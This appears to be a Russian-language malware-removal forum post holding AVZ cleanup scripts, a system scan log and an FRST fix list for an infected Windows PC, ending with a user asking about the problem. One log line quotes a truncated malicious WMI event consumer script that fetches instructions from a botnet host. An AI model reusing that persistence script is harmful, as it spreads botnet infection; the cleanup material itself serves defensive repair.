Antivitamin
Новый пользователь
- Сообщения
- 4
- Реакции
- 1
Смотрите видео ниже, чтобы узнать, как установить наш сайт в качестве веб-приложения на домашнем экране.
Примечание: Эта возможность может быть недоступна в некоторых браузерах.
begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
then
begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
end;
SetServiceStart('Windows Audio Control', 4);
StopService('Windows Audio Control');
QuarantineFile('C:\WINDOWS\help\lsmosee.exe','');
QuarantineFile('c:\program files\common files\conime.exe','');
DeleteFile('c:\program files\common files\conime.exe','32');
DeleteFile('C:\Program Files\Common Files\conime.exe','32');
DeleteFile('C:\WINDOWS\help\lsmosee.exe','32');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start','command');
RegKeyParamDel('HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg\start1','command');
DeleteService('Windows Audio Control');
BC_Activate;
ExecuteSysClean;
ExecuteWizard('SCU', 2, 3, true);
BC_ImportALL;
RebootWindows(true);
end.
begin
DeleteFile(GetAVZDirectory+'quarantine.7z');
ExecuteFile(GetAVZDirectory+'7za.exe', 'a -mx9 -pmalware quarantine ./Quarantine/', 1, 0, true);
end.
R3 - HKU\S-1-5-21-790525478-725345543-682003330-1005: Default URLSearchHook is missing
O2 - HKLM\..\BHO: (no name) - {95B7759C-8C7F-4BF1-B163-73684A933233} - (no file)
O4 - MSConfig\startupreg: vProt [command] = C:\Program Files\AVG Web TuneUp\vprot.exe (file missing) (HKLM) (2017/05/30)
O5 - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Control Panel\don't load: [nvcpl.cpl] (file missing)
O25 - WMI Event: fuckyoumm2_consumer - fuckyoumm2_filter - var toff=3000;var url1 = "http://wmi.mykings.top:8888/kill.html";http = new ActiveXObject("Msxml2.ServerXMLHTTP");fso = new ActiveXObject("Scripting.FilesystemObject");wsh = new ActiveXObject("WScript.Shell");http.open("GET", url1, false);http.send();str = http.responseText;arr = str.split("\r\n");f(1730 bytes)
Start::
CreateRestorePoint:
VirusTotal: C:\WINDOWS\system32\msfeedssync.exe
HKU\S-1-5-21-790525478-725345543-682003330-1003\...\MountPoints2: {1b9ce7aa-9ca3-11e2-9399-4c72b9b0c65a} - "G:\WD SmartWare.exe" autoplay=true
2018-08-02 22:24 - 2018-08-02 22:24 - 000000084 _____ () C:\Program Files\Common Files\xpdown.dat
MSCONFIG\startupreg: start =>
MSCONFIG\startupreg: start1 =>
EmptyTemp:
Reboot:
End::
Что с проблемой?